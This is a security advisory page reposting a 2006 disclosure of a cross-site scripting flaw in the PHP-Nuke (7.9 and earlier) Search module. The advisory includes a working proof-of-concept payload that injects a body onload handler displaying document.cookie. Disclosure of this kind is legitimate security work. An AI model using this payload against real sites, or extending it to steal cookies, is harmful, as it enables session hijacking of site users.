Computer Security

Security Advisory: PHP-Nuke <= 7.9 Search XSS Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA20515] WebFORM and FORM2MAIL Mail Header Injection Vulnerability

  [Full-disclosure] Docebo CMS 3.0.3, Remote command execution

  'Multiple Sql injection and XSS in integramod portal

  Back-end = 0.7.2.1 (jpcache.
php) Remote command execution

From:try_og_(at)_hotmail.com <try_og_(at)_hotmail.com>
Date:09.06.2006
Subject:PHP-Nuke <= 7.9 Search XSS Vulnerability

# PHP-Nuke <= 7.9 Search module XSS Vulnerability
# It could work on later versions if PHP-Nuke does not patch it.

1: Enter: http://[host]/modules.php?name=Search
2: Search for: "><body onload="alert(document.cookie)

// You'll get a javascript alert with your cookie in it.

# Credits: O.G.
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru